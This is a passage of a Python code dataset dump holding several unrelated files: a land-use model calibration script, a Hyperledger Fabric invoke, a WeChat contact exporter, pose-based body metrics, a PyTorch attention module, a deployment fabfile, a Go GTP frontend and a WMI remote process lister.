initial neighbourhood rule values for inertia and conversion.\nfor i in range(0, act):\n for j in range(0, luc):\n # Specify the neighbourhood rule key.\n key = \"from \" + luc_names[j] + \" to \" + luc_names[i + pas]\n # If a self-influence rule, set the inertia value.\n if i + pas == j:\n if cont_table[i + pas, luc] > cont_table[luc, i + pas]:\n rules[key][0] = low_inertia\n else:\n inertia_rate = ic_rates[j, i + pas]\n if inertia_rate > high_inertia_band:\n rules[key][0] = high_inertia\n elif inertia_rate > mid_inertia_band:\n rules[key][0] = mid_inertia\n else:\n rules[key][0] = low_inertia\n # If an interactive rule, set the conversion rule.\n else:\n conversion_rate = ic_rates[j, i + pas]\n if conversion_rate > high_conversion_band:\n rules[key][0] = high_conversion\n elif conversion_rate > mid_conversion_band:\n rules[key][0] = mid_conversion\n elif conversion_rate > low_conversion_band:\n rules[key][0] = low_conversion\n# Set the initial neighbourhood rule values for attraction.\nfor i in range(0, act):\n for j in range(0, luc):\n # Specify the neighbourhood rule key.\n key = \"from \" + luc_names[j] + \" to \" + luc_names[i + pas]\n # If a self-influence rule, set the self-influence attraction values.\n if i + pas == j:\n for c in range(1, 3):\n if c == 1:\n if att_rules[j, i] == 1:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d1_high_si_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d1_mid_si_value\n else:\n rules[key][c] = d1_low_si_value\n elif c == 2:\n if att_rules[j, i] == 1:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d2_high_si_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d2_mid_si_value\n else:\n rules[key][c] = d2_low_si_value\n # If a 
conversion rule, set the interactive attraction values.\n else:\n if (\n att_rules[j, i] == 1 and log_data_ef[1, j, i] > 0 and\n log_data_ef[2, j, i] > 0\n ):\n for c in range(1, 3):\n if c == 1:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d1_high_co_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d1_mid_co_value\n elif log_data_ef[c, j, i] > 0:\n rules[key][c] = d1_low_co_value\n elif c == 2:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d2_high_co_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d2_mid_co_value\n elif log_data_ef[c, j, i] > 0:\n rules[key][c] = d2_low_co_value\n# Set the end-points of each attraction rule\nfor i in range(0, act):\n for j in range(0, luc):\n if att_rules[j, i] == 0:\n pass\n else:\n # Specify the neighbourhood rule key.\n key = \"from \" + luc_names[j] + \" to \" + luc_names[i + pas]\n # Iterate through to find end point\n for c in range(2, 5):\n if att_rules[j, i] == 1 and log_data_ef[c, j, i] > 0:\n rules[key][3] = c + 1\n\n# Input the rules into the model.\nfor i in range(0, luc):\n for j in range(0, act):\n key = \"from \" + luc_names[i] + \" to \" + luc_names[j + pas]\n fu_elem = j\n lu_elem = i\n y0 = rules[key][0]\n y1 = rules[key][1]\n y2 = rules[key][2]\n xe = rules[key][3]\n set_lp_rule(project_file, fu_elem, lu_elem, y0, y1, y2, xe)\n\n# Enumerate possible ratio values.\n# First, initialise a dictionary to store metrics, this is done to account\n# for variable size.\nmetrics = {}\n\"\"\"***Change the bounds here ***\"\"\"\n# Start with the self-influence tail values. First, specify the range that will be tested.\nvaried_parameter = \"theta_ct\"\nlow_bound = 0\nhigh_bound = 1\ntheta_ct_step = 0.001\nfor a in range(low_bound, high_bound, 1):\n theta_ct1 = float(a)*theta_ct_step\n theta_ct2 = theta_ct1*0.1\n # Set the distance 1 tail values for interaction rules.\n d1_high_co_value = high_inertia * theta_ct1\n d1_mid_co_value = mid_inertia * theta_ct1\n d1_low_co_value = low_inertia * theta_ct1\n # Set the distance 2 tail value for interaction rules.\n d2_high_co_value = high_inertia * theta_ct2\n d2_mid_co_value = mid_inertia * theta_ct2\n d2_low_co_value = low_inertia * theta_ct2\n # Input the set values into the model.\n for i in range(0, act):\n for j in range(0, luc):\n # Specify the neighbourhood rule key.\n key = \"from \" + luc_names[j] + \" to \" + luc_names[i + pas]\n # If a self-influence rule, skip.\n if i + pas == j:\n pass\n # If an interactive rule, set the conversion point value.\n else:\n if (\n att_rules[j, i] == 1 and log_data_ef[1, j, i] > 0 and\n log_data_ef[2, j, i] > 0\n ):\n for c in range(1, 3):\n if c == 1:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d1_high_co_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d1_mid_co_value\n elif log_data_ef[c, j, i] > 0:\n rules[key][c] = d1_low_co_value\n elif c == 2:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d2_high_co_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d2_mid_co_value\n elif log_data_ef[c, j, i] > 0:\n rules[key][c] = d2_low_co_value\n # Input the rules to the specified project files.\n # This is only done for the conversion rules.\n for i in range(0, luc):\n for j in range(0, act):\n key = \"from \" + luc_names[i] + \" to \" + luc_names[j + pas]\n fu_elem = j\n lu_elem = i\n if i != j + pas:\n y0 = rules[key][0]\n y1 = rules[key][1]\n y2 = rules[key][2]\n xe = rules[key][3]\n set_lp_rule(project_file, fu_elem, lu_elem, y0, y1, y2, xe)\n # Generate the simulated output and 
track the results.\n run_count = 0\n ksim_log = [0]*max_runs\n clu_log = [0]*max_runs\n while run_count < max_runs:\n # Generate seed, run model to generate output.\n rseed = base_seed + run_count\n set_rand(project_file, rseed)\n run_metro(project_file, log_file, working_directory,\n geo_cmd)\n # Read in the map.\n smap = read_map(smap_path)\n # Calculate the corresponding metrics\n ksim_log[run_count] = ksim(omap, amap, smap, mask)\n clu_log[run_count] = area_weighted_clu_error(amap, smap, mask, luc, pas, act, luc_count)\n # Add one to iterator to avoid infinite loop!\n run_count = run_count + 1\n # Log metric properties corresponding to the output\n # First for Kappa Simulation\n key = \"ksim-\" + str(a)\n metrics[key] = [0]*3\n metrics[key][0] = sum(ksim_log)/len(ksim_log)\n metrics[key][1] = (max(ksim_log) - min(ksim_log))/2\n # Next for Absolute average clumpiness error.\n key = \"clu_error-\" + str(a)\n metrics[key] = [0] * 3\n metrics[key][0] = sum(clu_log) / len(clu_log)\n metrics[key][1] = (max(clu_log) - min(clu_log)) / 2\n# Organise and evaluate output.\n\n# Write the output to a .csv file.\nmetrics_output_file = output_path + case_study + \"\\\\theta_ct_meta_analysis_output.csv\"\nstore = [0]*5\nwith open (metrics_output_file, \"wb\") as csv_file:\n writer = csv.writer(csv_file)\n values = [\"theta_ct value\", \"KSIM avg.\", \"KSIM_err\", \"CLU avg\", \"CLU_err\"]\n writer.writerow(values)\n for a in range(low_bound, high_bound, 1):\n store[0] = float(a)*theta_ct_step\n store[1] = metrics[(\"ksim-\" + str(a))][0]\n store[2] = metrics[(\"ksim-\" + str(a))][1]\n store[3] = metrics[(\"clu_error-\" + str(a))][0]\n store[4] = metrics[(\"clu_error-\" + str(a))][1]\n writer.writerow(store)\n\n# Finished!","sub_path":"2c. Meta-analysis-conversion_tail.py","file_name":"2c. 
Meta-analysis-conversion_tail.py","file_ext":"py","file_size_in_byte":15623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"288027442","text":"import asyncio\nfrom hfc.fabric import Client\n\nloop = asyncio.get_event_loop()\n\ncli = Client(net_profile=\"/home/Adel/Desktop/PFE/Two_Chain_Network_Template/pfe-project/sdk/MyNetwork.json\")\norg1_admin = cli.get_user('org1.dz', 'Admin')\n\n\n\norg1_admin = cli.get_user(org_name='org1.dz', name='Admin')\n# Make the client know there is a channel in the network\ncli.new_channel('firstchannel')\n\n\n\n# Invoke the chaincode\nargs = ['10/07/2020 06:09:30', '[2kw, 4kw, 18kw, 21kw, 11kw, 10kw, 9kw, 13kw, 4kw, 15kw, 12kw, 8kw]', 'sd7f6s7f6s7f8as7fs7f8', '[66, 45, 78, 94, 77, 0, 0, 0, 0, 0, 44, 36]', 'asf7safs6f5s4df5sd4fas']\n\n# The response should be true if the invocation succeeds\nresponse = loop.run_until_complete(\n cli.chaincode_invoke(\n requestor=org1_admin,\n channel_name='firstchannel',\n peers=['peer0.org1.dz', 'peer1.org1.dz', 'peer2.org1.dz', 'peer3.org1.dz'],\n args=args,\n fcn='NewData',\n cc_name='first_chaincode',\n transient_map=None, # optional, for private data\n wait_for_event=True, # to be sure the chaincode invocation has been committed to the ledger, default is on tx event\n )\n )\n\nprint(response)\n","sub_path":"pfe-project/fabric-sdk-py/invoke.py","file_name":"invoke.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"144885374","text":"# -*-coding:utf-8 -*-\nimport itchat\nimport json\nimport traceback\nimport os\nfrom analysisData import analysisData\n\n\n\ndef checkLogin(func):\n def wrapper(*args, **kwargs):\n \"\"\"\n Decorator: check the login status\n \"\"\"\n try:\n print('checkLogin.... ...')\n uuid = itchat.get_QRuuid()\n if itchat.check_login(uuid) != '200':\n # log in to WeChat by scanning the QR code, and save the login info\n itchat.auto_login(hotReload=True)\n return func(*args, **kwargs)\n except:\n print(traceback.format_exc())\n\n return wrapper\n\nimport pandas as pd\nimport numpy as np\nimport json\nimport csv\n\ndef writeCSV(lines):\n with open('friendInfo.csv','w+',encoding='utf-8') as f:\n write=csv.writer(f)\n write.writerow(['remarkName','nickName','sex','province','city','signature'])\n for line in lines:\n write.writerow(line)\n\n# def writeJson(infoList):\n# \"\"\"\n# Write the JSON data to a text file\n# \"\"\"\n# os.remove('friendInfo.txt')\n# for info in infoList:\n# infoJsonStr = json.dumps(info, ensure_ascii=False)\n# with open('friendInfo.txt', 'a+', encoding='utf-8') as f:\n# f.writelines('{0}{1}'.format(infoJsonStr, '\\n'))\n\n\n# @checkLogin\n# def sendMsgToOne(userName):\n# \"\"\"\n# Send a message to a single contact\n# \"\"\"\n# userId = itchat.search_friends(name=userName)[0]['UserName'] # look up the user id by Name\n# itchat.send_msg('测试信息', toUserName=userId) # send the message\n\n\n@checkLogin\ndef statistic():\n \"\"\"\n Collect the WeChat friends' information\n \"\"\"\n try:\n friendList = itchat.get_friends(update=True)[0:]\n friendInfoList = []\n for info in friendList:\n # friendInfo = {}\n remarkName = info['RemarkName']\n # friendInfo['remarkName'] = remarkName\n nickName = info['NickName']\n # friendInfo['nickName'] = nickName\n if info['Sex'] == 1:\n sex = '男'\n elif info['Sex'] == 2:\n sex = '女'\n else:\n sex = '其他'\n # friendInfo['sex'] = sex\n province = info['Province']\n # friendInfo['province'] = province\n city = info['City']\n # friendInfo['city'] = city\n signature = info['Signature']\n # friendInfo['signature'] = signature\n friendInfo = [remarkName,nickName,sex,province,city,signature]\n friendInfoList.append(friendInfo)\n # break\n # print('friendInfoList=',friendInfoList)\n return friendInfoList\n except:\n print(traceback.format_exc())\n\n\nif __name__ == '__main__':\n \"\"\"\n Main function\n \"\"\"\n try:\n # log in to WeChat by scanning the QR code, and save the login info\n itchat.auto_login(hotReload=True)\n # sendMsgToOne()\n infoList = statistic()\n # writeJson(infoList)\n writeCSV(infoList)\n # print(infoList)\n analysisData()\n except:\n print(traceback.format_exc())\n","sub_path":"wechat/wechat.py","file_name":"wechat.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"648465794","text":"# Metric class for spatial changes of the torso\n# \n# Maximum divergence between the arms and the torso (take the 80th percentile to be safe?) +\n# Maximum divergence between the arms themselves +\n# Height from the toe to the fingers (the objective arm height) +\n# Distance from the knee joint to the shoulder (the objective distorted knee-lift height while walking) +\n# Distorted height (from the heels through the knees, pelvis and shoulders to the head) +\n# Distance between the shoulders +\n# Pelvis width + \n\nfrom scipy.spatial.distance import euclidean\nimport numpy as np\n\nfrom loguru import logger\nfrom services import (\n extractSeries,\n countMinMaxMean\n)\nclass Body():\n def __init__(self, df) -> None:\n self.series = extractSeries(df)\n\n self.minHeight, self.maxHeight, self.meanHeight = countMinMaxMean(self.getHeight())\n self.minFeetWristHeight, self.maxFeetWristHeight, self.meanFeetWristHeight = countMinMaxMean(self.getFeetWristHeight())\n self.minArmsDispersion, self.maxArmsDispersion, self.meanArmsDispersion = countMinMaxMean(self.getArmsDispersion())\n self.minArmsBodyDispersion, self.maxArmsBodyDispersion, self.meanArmsBodyDispersion = countMinMaxMean(self.getBodyArmsDispersion())\n self.minHipsDiffer, self.maxHispDiffer, self.meanHipsDiffer = countMinMaxMean(self.getHipsDiffers())\n\n self.shoulderWidth = self.getMeanShouldersWidth()\n self.hipsWidth = self.getMeanHipsWidth()\n \n def getHipsDiffers(self):\n for seria in self.series:\n subSeria = seria[[\n 'Таз слева',\n \"Таз справа\"\n ]]\n differ = pow(subSeria[0][1] - subSeria[1][1], 2)\n \n yield differ\n\n def getHeight(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левая лодыжка',\n \"Правая лодыжка\",\n \"Нос\"\n ]]\n\n left_height = euclidean(subSeria[0], subSeria[2])\n right_height = euclidean(subSeria[1], subSeria[2])\n height = (left_height + right_height) / 2\n\n yield height\n\n def getArmsDispersion(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левая кисть',\n \"Правая кисть\"\n ]]\n\n hands = euclidean(subSeria[0], subSeria[1])\n\n yield hands\n \n def getBodyArmsDispersion(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левая кисть',\n 'Левое плечо',\n \"Правая кисть\",\n 'Правое плечо'\n ]]\n\n left = euclidean(subSeria[0], subSeria[1])\n right = euclidean(subSeria[2], subSeria[3])\n\n yield left + right\n\n def getFeetWristHeight(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левый носок',\n 'Левая кисть',\n \"Правый носок\",\n 'Правая кисть'\n ]]\n\n left = euclidean(subSeria[0], subSeria[1])\n right = euclidean(subSeria[2], subSeria[3])\n\n yield (left + right) / 2\n\n def getKneeHeight(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левое колено',\n 'Левое плечо',\n \"Правое колено\",\n 'Правое плечо'\n ]]\n\n left = euclidean(subSeria[0], subSeria[1])\n right = euclidean(subSeria[2], subSeria[3])\n\n yield (left + right) / 2\n\n def getShoulderWidth(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левое плечо',\n 'Правое плечо'\n ]]\n width = euclidean(subSeria[0], subSeria[1])\n yield width\n\n def getMeanShouldersWidth(self):\n widths = self.getShoulderWidth()\n return np.mean(list(widths))\n\n def getHipsWidth(self):\n for seria in self.series:\n subSeria = seria[[\n 'Таз слева',\n 'Таз справа'\n ]]\n width = euclidean(subSeria[0], subSeria[1])\n yield width\n\n def getMeanHipsWidth(self):\n widths = self.getHipsWidth()\n return np.mean(list(widths))","sub_path":"walkSupport/SMP/metrics/body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"190273453","text":"import torch\nimport torch.nn as nn
\nimport torch.nn.functional as F\n\n\nclass Attention(nn.Module):\n r\"\"\"\n Applies an attention mechanism on the output features from the decoder.\n\n .. math::\n \\begin{array}{ll}\n x = context*output \\\\\n attn = exp(x_i) / sum_j exp(x_j) \\\\\n output = \\tanh(w * (attn * context) + b * output)\n \\end{array}\n\n Args:\n dim(int): The number of expected features in the output\n n_probes(int): The number of attention probe vectors\n\n Inputs: output, context\n - **output** (batch, output_len, dimensions): tensor containing the output features from the decoder.\n - **context** (batch, input_len, dimensions): tensor containing features of the encoded input sequence.\n\n Outputs: output, attn\n - **output** (batch, output_len, dimensions): tensor containing the attended output features from the decoder.\n - **attn** (batch, output_len, input_len): tensor containing attention weights.\n\n Attributes:\n linear_out (torch.nn.Linear): applies a linear transformation to the incoming data: :math:`y = Ax + b`.\n mask (torch.Tensor, optional): applies a :math:`-inf` to the indices specified in the `Tensor`.\n\n Examples::\n\n >>> attention = seq2seq.models.Attention(256, 10)\n >>> context = Variable(torch.randn(5, 3, 256))\n >>> output = Variable(torch.randn(5, 5, 256))\n >>> output, attn = attention(output, context)\n\n \"\"\"\n def __init__(self, dim, n_probes):\n super(Attention, self).__init__()\n self.linear_out = nn.Linear(dim*n_probes, dim)\n self.mask = None\n self.n_probes = n_probes\n self.self_attn = nn.Parameter(torch.FloatTensor(n_probes, dim))\n\n def set_mask(self, mask):\n \"\"\"\n Sets indices to be masked\n\n Args:\n mask (torch.Tensor): tensor containing indices to be masked\n \"\"\"\n self.mask = mask\n\n def forward(self, encoder_outputs):\n batch_size = encoder_outputs.size(0)\n hidden_size = encoder_outputs.size(2)\n input_size = encoder_outputs.size(1)\n \n # (batch, n_probes, dim) * (batch, in_len, dim) -> (batch, n_probes, in_len)\n attn = torch.bmm(self.self_attn.expand(batch_size, self.n_probes, hidden_size), encoder_outputs.transpose(1, 2))\n# attn = torch.bmm(self.self_attn.expand(batch_size, -1, -1), encoder_outputs.transpose(1, 2))\n if self.mask is not None:\n attn.data.masked_fill_(self.mask, -float('inf'))\n# attn = F.softmax(attn.view(-1, input_size)).view(batch_size, -1, input_size)\n attn = F.softmax(attn.view(-1, input_size), dim=1).view(batch_size, -1, input_size)\n\n # (batch, n_probes, in_len) * (batch, in_len, dim) -> (batch, n_probes, dim)\n mix = torch.bmm(attn, encoder_outputs)\n\n output = torch.tanh(self.linear_out(mix.view(batch_size, -1)))\n\n return output\n\n'''\na=Variable(torch.randn(3,3), requires_grad=False)\nb=Variable(torch.randn(3,3), requires_grad=True)\nmask=b.ge(0)\nindices=mask.data.nonzero().transpose(0,1).tolist()\na[indices]=b[indices]\nout=a.mean()\nout.backward()\n'''","sub_path":"seq2seq/models/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"524910681","text":"from fabric.api import task, local, cd, put, hosts, sudo, execute\n\nfrom clldfabric.util import working_directory\nfrom clldfabric import tasks\ntasks.init('glottolog3')\n\n\ndef bin(name):\n return '/home/robert/venvs/clld/bin/' + name\n\n\ndef run_script(name):\n local('%s glottolog3/scripts/%s.py development.ini' % (bin('python'), name))\n\n\n@hosts(tasks.APP.production)\n@task\ndef copy_treefiles():\n with working_directory('glottolog3/static/'):\n local('tar -czvf trees.tgz trees')\n put('trees.tgz', '/tmp')\n\n with cd('/usr/venvs/glottolog3/src/glottolog3/glottolog3/static'):
\n sudo('mv /tmp/trees.tgz .')\n sudo('tar -xzvf trees.tgz')\n sudo('chown -R root:root trees')\n\n\n@hosts(tasks.APP.production)\n@task\ndef recreate_treefiles():\n run_script('compute_treefiles')\n execute(copy_treefiles)\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"475079296","text":"import sys\n\nfrom rlgames.util import print_board\nfrom rlgames.game_base import Move\nfrom rlgames.goboard import GameState\nfrom rlgames.agent.termination import TerminationAgent\nfrom rlgames.gtp.board import gtp_position_to_coord, coord_to_gtp_position\nfrom rlgames.gtp import command, response\n\nHANDICAP_STONES = {\n 2: ['D4', 'Q16'],\n 3: ['D4', 'Q16', 'D16'],\n 4: ['D4', 'Q16', 'D16', 'Q4'],\n 5: ['D4', 'Q16', 'D16', 'Q4', 'K10'],\n 6: ['D4', 'Q16', 'D16', 'Q4', 'D10', 'Q10'],\n 7: ['D4', 'Q16', 'D16', 'Q4', 'D10', 'Q10', 'K10'],\n 8: ['D4', 'Q16', 'D16', 'Q4', 'D10', 'Q10', 'K4', 'K16'],\n 9: ['D4', 'Q16', 'D16', 'Q4', 'D10', 'Q10', 'K4', 'K16', 'K10'],\n}\n\nclass GTPFrontend:\n def __init__(self, termination_agent, termination=None):\n self.agent = termination_agent\n self.game_state = GameState.new_game(19)\n self.input = sys.stdin\n self.output = sys.stdout\n self.stopped = False\n self.handlers = {\n 'boardsize' : self.handle_boardsize,\n 'clear_board' : self.handle_clear_board,\n 'fixed_handicap' : self.handle_fixed_handicap,\n 'genmove' : self.handle_genmove,\n 'known_command' : self.handle_known_command,\n 'showboard' : self.handle_showboard,\n 'time_settings' : self.handle_time_settings,\n 'time_left' : self.handle_time_left,\n 'play' : self.handle_play,\n 'protocol_version' : self.handle_protocol_version,\n 'quit' : self.handle_quit,\n }\n\n def run(self):\n while not self.stopped:\n input_line = self.input.readline().strip()\n cmd = command.parse(input_line)\n resp = self.process(cmd)\n self.output.write(response.serialize(cmd, resp))\n self.output.flush()\n \n def process(self, cmd):\n handler = self.handlers.get(cmd.name, self.handle_unknown)\n return handler(*cmd.args)\n\n def handle_play(self, color, move):\n if move.lower() == 'pass':\n self.game_state = self.game_state.apply_move(Move.pass_turn())\n elif move.lower() == 'resign':\n self.game_state = self.game_state.apply_move(Move.resign())\n else:\n self.game_state = self.game_state.apply_move(Move.play(gtp_position_to_coord(move)))\n return response.success()\n\n def handle_genmove(self, color):\n move = self.agent.select_move(self.game_state)\n self.game_state = self.game_state.apply_move(move)\n if move.is_pass:\n return response.success('pass')\n elif move.is_resign:\n return response.success('resign')\n else:\n return response.success(coord_to_gtp_position(move))\n\n def handle_fixed_handicap(self, nstones):\n nstones = int(nstones)\n for stone in HANDICAP_STONES[nstones]:\n self.game_state = self.game_state.apply_move(Move.play(gtp_position_to_coord(stone)))\n return response.success()\n\n def handle_quit(self):\n self.stopped = True\n return response.success()\n\n def handle_clear_board(self):\n self.game_state = GameState.new_game(19)\n return response.success()\n\n def handle_known_command(self, command_name):\n return response.bool_response(command_name in self.handlers.keys())\n\n def handle_boardsize(self, size):\n if int(size) != 19:\n return response.error('Only 19x19 currently supported, requested {}'.format(size))\n return response.success()
\n\n def handle_showboard(self):\n print_board(self.game_state.board)\n return response.success()\n\n def handle_time_left(self, color, time, stones):\n # TODO: Arguments: color color, int time, int stones\n return response.success()\n\n def handle_time_settings(self, main_time, byo_yomi_time, byo_yomi_stones):\n # TODO: Arguments: int main_time, int byo_yomi_time, int byo_yomi_stones\n return response.success()\n\n def handle_unknown(self, *args):\n return response.error('Unrecognized command')\n\n def ignore(self, *args):\n return response.success()\n\n def handle_protocol_version(self):\n return response.success('2')\n","sub_path":"python/rlgames/gtp/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"536372388","text":"#!/usr/bin/python\n\n\"\"\"\nWMI: Remote machine processes\n\"\"\"\n\n\nimport sys\nimport lib_util\nimport lib_common\nimport lib_wmi\nfrom lib_properties import pc\n\n# If it cannot be imported, this is checked when loading the script.\nimport wmi\n\n\n#instance of Win32_Process\n#{\n# Caption = \"SearchFilterHost.exe\";\n# CommandLine = \"\\\"C:\\\\Windows\\\\system32\\\\SearchFilterHost\n# CreationClassName = \"Win32_Process\";\n# CreationDate = \"20150312142114.211889+000\";\n# CSCreationClassName = \"Win32_ComputerSystem\";\n# CSName = \"LONW00052257\";\n# Description = \"SearchFilterHost.exe\";\n# ExecutablePath = \"C:\\\\Windows\\\\system32\\\\SearchFilterHos\n# Handle = \"26376\";\n# HandleCount = 106;\n# KernelModeTime = \"156001\";\n# MaximumWorkingSetSize = 32768;\n# MinimumWorkingSetSize = 200;\n# Name = \"SearchFilterHost.exe\";\n# OSCreationClassName = \"Win32_OperatingSystem\";\n# OSName = \"Microsoft Windows 7 Enterprise |C:\\\\Windows|\\\\\n# OtherOperationCount = \"627\";\n# OtherTransferCount = \"4620\";\n# PageFaults = 2206;\n# PageFileUsage = 3408;\n# ParentProcessId = 964;\n# PeakPageFileUsage = 3408;\n# PeakVirtualSize = \"35500032\";\n# PeakWorkingSetSize = 7340;\n# Priority = 4;\n# PrivatePageCount = \"3489792\";\n# ProcessId = 26376;\n# QuotaNonPagedPoolUsage = 9;\n# QuotaPagedPoolUsage = 96;\n# QuotaPeakNonPagedPoolUsage = 9;\n# QuotaPeakPagedPoolUsage = 96;\n# ReadOperationCount = \"353\";\n# ReadTransferCount = \"29438\";\n# SessionId = 0;\n# ThreadCount = 6;\n# UserModeTime = \"156001\";\n# VirtualSize = \"35500032\";\n# WindowsVersion = \"6.1.7601\";\n# WorkingSetSize = \"7516160\";\n# WriteOperationCount = \"0\";\n# WriteTransferCount = \"0\";\n#};\n\nCanProcessRemote = True\n\ndef Main():\n\tcgiEnv = lib_common.CgiEnv(can_process_remote = True)\n\tmachineName = cgiEnv.GetId()\n\n\tgrph = cgiEnv.GetGraph()\n\n\t# If running on the local machine, pass the host as None otherwise authorization is checked\n\t# just like a remote machine, which means User Account Control (UAC) disabling,\n\t# and maybe setting LocalAccountTokenFilterPolicy=1\n\tif not machineName or lib_util.IsLocalAddress( machineName ):\n\t\tmachNameNotNone = lib_util.currentHostname\n\t\tserverBox = lib_common.gUriGen\n\telse:\n\t\tmachNameNotNone = machineName\n\t\tserverBox = lib_common.RemoteBox(machineName)\n\n\ttry:\n\t\t# There is an \"access denied\" problem with all remote Windows accesses.\n\t\t# The same problem also happens with WMI, although it used to work before.\n\t\t# As if there had been an implicit connection from rchateau when it worked, which has now disappeared.\n\t\t# However, this works:\n\t\t# >>> c = wmi.WMI(wmi=wmi.connect_server(server='Titi', namespace=\"/root/cimv2\", user='rchateauneu@hotmail.com', password='xxxx'))\n\n\t\tsys.stderr.write(\"Explicit WMI connection machineName=%s\\n\" % ( machNameNotNone ) )\n\n\t\tcnnct = lib_wmi.WmiConnect(machNameNotNone,\"/root/cimv2\")\n\n\t\t#(wmiUser,wmiPass) = lib_credentials.GetCredentials(\"WMI\",machineName)\n\t\t#sys.stderr.write(\"machineName= %wmiUser=%s\\n\" % ( machineName, wmiUser ) )\n\t\t#cnnct = wmi.WMI(wmi=wmi.connect_server(server=machineName, namespace=\"/root/cimv2\", user=wmiUser, password=wmiPass))\n\texcept Exception:\n\t\tlib_common.ErrorMessageHtml(\"WMI \" + machineName + \" processes. Caught:\" + str(sys.exc_info()) )\n\n\t# With a dictionary so nodes are created only once.\n\tMain.dictPidToNode = {}\n\n\tdef PidToNode(procId):\n\t\ttry:\n\t\t\treturn Main.dictPidToNode[procId]\n\t\texcept KeyError:\n\t\t\tnode = serverBox.PidUri(procId)\n\n\t\t\tMain.dictPidToNode[procId] = node\n\t\t\treturn node\n\n\tfor processProperties in cnnct.Win32_Process ():\n\n\t\tnode_process = PidToNode(processProperties.ProcessId)\n\t\tparent_node_process = PidToNode(processProperties.ParentProcessId)\n\n\t\tgrph.add( ( node_process, pc.property_ppid, parent_node_process ) )\n\t\t#grph.add( ( node_process, pc.property_pid, lib_common.NodeLiteral(processProperties.ProcessId) ) )\n\n\t\t# If the code is left as is, it will print:\n\t\t# No such process:1292 at Titi\n\t\t# pid 1292\n\t\t#\n\t\t# Which is silly, because all the data is already at hand.\n\n\t\t# >>> lp = cnnct.Win32_Process ()\n\t\t# >>> lp[0]\n\t\t# <_wmi_object: \\\\TITI\\root\\cimv2:Win32_Process.Handle=\"0\">\n\t\t# >>> str(lp[0])\n\t\t# '\\ninstance of Win32_Process\\n{\\n\\tCaption = \"System Idle Process\";\\n\\tCreationClassName = \"Win32_Process\";\\n\\tCreationDate = \"20161\n\t\t# 215105022.381553+000\";\\n\\tCSCreationClassName = \"Win32_ComputerSystem\";\\n\\tCSName = \"TITI\";\\n\\tDescription = \"System Idle Process\";\\\n\t\t# n\\tHandle = \"0\";\\n\\tHandleCount = 0;\\n\\tKernelModeTime = \"23403826406250\";\\n\\tName = \"System Idle Process\";\\n\\tOSCreationClassName =\n\t\t# \"Win32_OperatingSystem\";\\n\\tOSName = \"Microsoft Windows 8.1|C:\\\\\\\\Windows|\\\\\\\\Device\\\\\\\\Harddisk0\\\\\\\\Partition4\";\\n\\tOtherOperation\n\t\t# Count = \"0\";\\n\\tOtherTransferCount = \"0\";\\n\\tPageFaults = 1;\\n\\tPageFileUsage = 0;\\n\\tParentProcessId = 0;\\n\\tPeakPageFileUsage = 0;\n\t\t# \\n\\tPeakVirtualSize = \"65536\";\\n\\tPeakWorkingSetSize = 4;\\n\\tPriority = 0;\\n\\tPrivatePageCount = \"0\";\\n\\tProcessId = 0;\\n\\tQuotaNonP\n\t\t# agedPoolUsage = 0;\\n\\tQuotaPagedPoolUsage = 0;\\n\\tQuotaPeakNonPagedPoolUsage = 0;\\n\\tQuotaPeakPagedPoolUsage = 0;\\n\\tReadOperationCo\n\t\t# unt = \"0\";\\n\\tReadTransferCount = \"0\";\\n\\tSessionId = 0;\\n\\tThreadCount = 4;\\n\\tUserModeTime = \"0\";\\n\\tVirtualSize = \"65536\";\\n\\tWin\n\t\t# dowsVersion = \"6.3.9600\";\\n\\tWorkingSetSize = \"4096\";\\n\\tWriteOperationCount = \"0\";\\n\\tWriteTransferCount = \"0\";\\n};\\n'\n\n\n\t\tgrph.add( ( node_process, pc.property_information, lib_common.NodeLiteral(processProperties.Caption) ) )\n\t\tif processProperties.Caption != processProperties.Description:\n\t\t\tgrph.add( ( node_process, lib_common.MakeProp(\"Description\"), lib_common.NodeLiteral(processProperties.Description) ) )\n\n\t\t# ADD THE WMI LINK HERE AND IN THE PAGE http://127.0.0.1:8000/survol/entity.py?xid=Titi@CIM_Process.Handle=6344\n\n\t\t# All the rest is not needed yet, there would be too many things to display.\n\t\t#grph.add( ( node_process, pc.property_command, lib_common.NodeLiteral(process.CommandLine) ) )\n\t\t#\n\t\t#exec_name = process.ExecutablePath\n\t\t#if exec_name != None:\n\t\t#\texec_node = lib_common.gUriGen.FileUri( exec_name.replace('\\\\','/') )\n\t\t#\tgrph.add( ( node_process, pc.property_runs, exec_node ) 